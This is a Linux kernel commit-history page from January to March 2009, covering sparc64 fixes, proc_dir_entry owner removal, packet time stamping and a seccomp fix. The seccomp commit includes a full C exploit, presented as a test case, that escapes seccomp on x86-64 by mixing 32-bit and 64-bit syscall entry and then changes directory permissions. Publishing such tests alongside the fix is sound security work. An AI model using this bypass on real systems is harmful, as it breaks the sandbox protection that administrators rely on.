1. 31 3月, 2009 1 次提交
    • A
      proc 2/2: remove struct proc_dir_entry::owner · 99b76233
      Alexey Dobriyan 提交于
      Setting ->owner as done currently (pde->owner = THIS_MODULE) is racy
      as correctly noted at bug #12454. Someone can lookup entry with NULL
      ->owner, thus not pinning enything, and release it later resulting
      in module refcount underflow.
      
      We can keep ->owner and supply it at registration time like ->proc_fops
      and ->data.
      
      But this leaves ->owner as easy-manipulative field (just one C assignment)
      and somebody will forget to unpin previous/pin current module when
      switching ->owner. ->proc_fops is declared as "const" which should give
      some thoughts.
      
      ->read_proc/->write_proc were just fixed to not require ->owner for
      protection.
      
      rmmod'ed directories will be empty and return "." and ".." -- no harm.
      And directories with tricky enough readdir and lookup shouldn't be modular.
      We definitely don't want such modular code.
      
      Removing ->owner will also make PDE smaller.
      
      So, let's nuke it.
      
      Kudos to Jeff Layton for reminding about this, let's say, oversight.
      
      http://bugzilla.kernel.org/show_bug.cgi?id=12454Signed-off-by: NAlexey Dobriyan <adobriyan@gmail.com>
      99b76233
  2. 30 3月, 2009 3 次提交
  3. 28 3月, 2009 1 次提交
  4. 27 3月, 2009 2 次提交
    • D
      sparc64: Fix MM refcount check in smp_flush_tlb_pending(). · f9384d41
      David S. Miller 提交于
      As explained by Benjamin Herrenschmidt:
      
      > CPU 0 is running the context, task->mm == task->active_mm == your
      > context. The CPU is in userspace happily churning things.
      >
      > CPU 1 used to run it, not anymore, it's now running fancyfsd which
      > is a kernel thread, but current->active_mm still points to that
      > same context.
      >
      > Because there's only one "real" user, mm_users is 1 (but mm_count is
      > elevated, it's just that the presence on CPU 1 as active_mm has no
      > effect on mm_count().
      >
      > At this point, fancyfsd decides to invalidate a mapping currently mapped
      > by that context, for example because a networked file has changed
      > remotely or something like that, using unmap_mapping_ranges().
      >
      > So CPU 1 goes into the zapping code, which eventually ends up calling
      > flush_tlb_pending(). Your test will succeed, as current->active_mm is
      > indeed the target mm for the flush, and mm_users is indeed 1. So you
      > will -not- send an IPI to the other CPU, and CPU 0 will continue happily
      > accessing the pages that should have been unmapped.
      
      To fix this problem, check ->mm instead of ->active_mm, and this
      means:
      
      > So if you test current->mm, you effectively account for mm_users == 1,
      > so the only way the mm can be active on another processor is as a lazy
      > mm for a kernel thread. So your test should work properly as long
      > as you don't have a HW that will do speculative TLB reloads into the
      > TLB on that other CPU (and even if you do, you flush-on-switch-in should
      > get rid of any crap here).
      
      And therefore we should be OK.
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      f9384d41
    • D
      sparc64: Fix build of timer_interrupt(). · e2ab3dff
      David Miller 提交于
      arch/sparc/kernel/time_64.c: In function ‘timer_interrupt’:
        arch/sparc/kernel/time_64.c:732: error: ‘struct kernel_stat’ has no member named ‘irqs’
        make[1]: *** [arch/sparc/kernel/time_64.o] Error 1
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      e2ab3dff
  5. 26 3月, 2009 1 次提交
  6. 19 3月, 2009 2 次提交
  7. 16 3月, 2009 10 次提交
  8. 05 3月, 2009 1 次提交
    • D
      sparc64: Fix lost interrupts on sun4u. · d0cac39e
      David S. Miller 提交于
      Based upon a report by Meelis Roos.
      
      Sparc64 SBUS and PCI controllers use a combination of IMAP and ICLR
      registers to manage device interrupts.
      
      The IMAP register contains the "valid" enable bit as well as CPU
      targetting information.  Whereas the ICLR register is written with
      zero at the end of handling an interrupt to reset the state machine
      for that interrupt to IDLE so it can be sent again.
      
      For PCI slot and SBUS slot devices we can have multiple interrupts
      sharing the same IMAP register.  There are individual ICLR registers
      but only one IMAP register for managing those.
      
      We represent each shared case with individual virtual IRQs so the
      generic IRQ layer thinks there is only one user of the IRQ instance.
      
      In such shared IMAP cases this is wrong, so if there are multiple
      active users then a free_irq() call will prematurely turn off the
      interrupt by clearing the Valid bit in the IMAP register even though
      there are other active users.
      
      Fix this by simply doing nothing in sun4u_disable_irq() and checking
      IRQF_DISABLED during IRQ dispatch.
      
      This situation doesn't exist in the hypervisor sun4v cases, so I left
      those alone.
      Tested-by: NMeelis Roos <mroos@linux.ee>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      d0cac39e
  9. 03 3月, 2009 1 次提交
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  10. 16 2月, 2009 1 次提交
    • P
      net: new user space API for time stamping of incoming and outgoing packets · cb9eff09
      Patrick Ohly 提交于
      User space can request hardware and/or software time stamping.
      Reporting of the result(s) via a new control message is enabled
      separately for each field in the message because some of the
      fields may require additional computation and thus cause overhead.
      User space can tell the different kinds of time stamps apart
      and choose what suits its needs.
      
      When a TX timestamp operation is requested, the TX skb will be cloned
      and the clone will be time stamped (in hardware or software) and added
      to the socket error queue of the skb, if the skb has a socket
      associated with it.
      
      The actual TX timestamp will reach userspace as a RX timestamp on the
      cloned packet. If timestamping is requested and no timestamping is
      done in the device driver (potentially this may use hardware
      timestamping), it will be done in software after the device's
      start_hard_xmit routine.
      Signed-off-by: NPatrick Ohly <patrick.ohly@intel.com>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      cb9eff09
  11. 11 2月, 2009 1 次提交
  12. 09 2月, 2009 2 次提交
    • D
      sparc64: Fix probe_kernel_{read,write}(). · aeb39876
      David S. Miller 提交于
      This is based upon a report from Chris Torek and his initial patch.
      From Chris's report:
      
      --------------------
      This came up in testing kgdb, using the built-in tests -- turn
      on CONFIG_KGDB_TESTS, then
      
          echo V1 > /sys/module/kgdbts/parameters/kgdbts
      
      -- but it would affect using kgdb if you were debugging and looking
      at bad pointers.
      --------------------
      
      When we get a copy_{from,to}_user() request and the %asi is set to
      something other than ASI_AIUS (which is userspace) then we branch off
      to a routine called memcpy_user_stub().  It just does a straight
      memcpy since we are copying from kernel to kernel in this case.
      
      The logic was that since source and destination are both kernel
      pointers we don't need to have exception checks.
      
      But for what probe_kernel_{read,write}() is trying to do, we have to
      have the checks, otherwise things like kgdb bad kernel pointer
      accesses don't do the right thing.
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      aeb39876
    • D
      sparc64: Kill .fixup section bloat. · 40bdac7d
      David S. Miller 提交于
      This is an implementation of a suggestion made by Chris Torek:
      --------------------
      Something else I noticed in passing: the EX and EX_LD/EX_ST macros
      scattered throughout the various .S files make a fair bit of .fixup
      code, all of which does the same thing.  At the cost of one symbol
      in copy_in_user.S, you could just have one common two-instruction
      retl-and-mov-1 fixup that they all share.
      --------------------
      
      The following is with a defconfig build:
      
         text	   data	    bss	    dec	    hex	filename
      3972767	 344024	 584449	4901240	 4ac978	vmlinux.orig
      39688877	 344024	 584449	4897360	 4aba50	vmlinux
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      40bdac7d
  13. 06 2月, 2009 1 次提交
  14. 05 2月, 2009 1 次提交
  15. 04 2月, 2009 1 次提交
    • D
      sparc64: Kill bogus TPC/address truncation during 32-bit faults. · 9b026058
      David S. Miller 提交于
      This builds upon eeabac73
      ("sparc64: Validate kernel generated fault addresses on sparc64.")
      
      Upon further consideration, we actually should never see any
      fault addresses for 32-bit tasks with the upper 32-bits set.
      
      If it does every happen, by definition it's a bug.  Whatever
      context created that fault would only have that fault satisfied
      if we used the full 64-bit address.  If we truncate it, we'll
      always fault the wrong address and we'll always loop faulting
      forever.
      
      So catch such conditions and mark them as errors always.  Log
      the error and fail the fault.
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      9b026058
  16. 03 2月, 2009 3 次提交
    • S
      47a4a0e7
    • D
      sparc64: Validate kernel generated fault addresses on sparc64. · eeabac73
      David S. Miller 提交于
      In order to handle all of the cases of address calculation overflow
      properly, we run sparc 32-bit processes in "address masking" mode
      when running on a 64-bit kernel.
      
      Address masking mode zeros out the top 32-bits of the address
      calculated for every load and store instruction.
      
      However, when we're in privileged mode we have to run with that
      address masking mode disabled even when accessing userspace from
      the kernel.
      
      To "simulate" the address masking mode we clear the top-bits by
      hand for 32-bit processes in the fault handler.
      
      It is the responsibility of code in the compat layer to properly
      zero extend addresses used to access userspace.  If this isn't
      followed properly we can get into a fault loop.
      
      Say that the user address is 0xf0000000 but for whatever reason
      the kernel code sign extends this to 64-bit, and then the kernel
      tries to access the result.
      
      In such a case we'll fault on address 0xfffffffff0000000 but the fault
      handler will process that fault as if it were to address 0xf0000000.
      We'll loop faulting forever because the fault never gets satisfied.
      
      So add a check specifically for this case, when the kernel is faulting
      on a user address access and the addresses don't match up.
      
      This code path is sufficiently slow path, and this bug is sufficiently
      painful to diagnose, that this kind of bug check is warranted.
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      eeabac73
    • D
      sparc64: On non-Niagara, need to touch NMI watchdog in NOHZ mode. · 802c64b3
      David S. Miller 提交于
      When we're idling in NOHZ mode, timer interrupts are not running.
      
      Evidence of processing timer interrupts is what the NMI watchdog
      uses to determine if the CPU is stuck.
      
      On Niagara, we'll yield the cpu.  This will make the cpu, at
      worst, hang out in the hypervisor until an interrupt arrives.
      This will prevent the NMI watchdog timer from firing.
      
      However on non-Niagara we just loop executing instructions
      which will cause the NMI watchdog to keep firing.  It won't
      see timer interrupts happening so it will think the cpu is
      stuck.
      
      Fix this by touching the NMI watchdog in the cpu idle loop
      on non-Niagara machines.
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      802c64b3
  17. 30 1月, 2009 1 次提交
  18. 29 1月, 2009 2 次提交
  19. 27 1月, 2009 1 次提交
  20. 22 1月, 2009 2 次提交
  21. 20 1月, 2009 2 次提交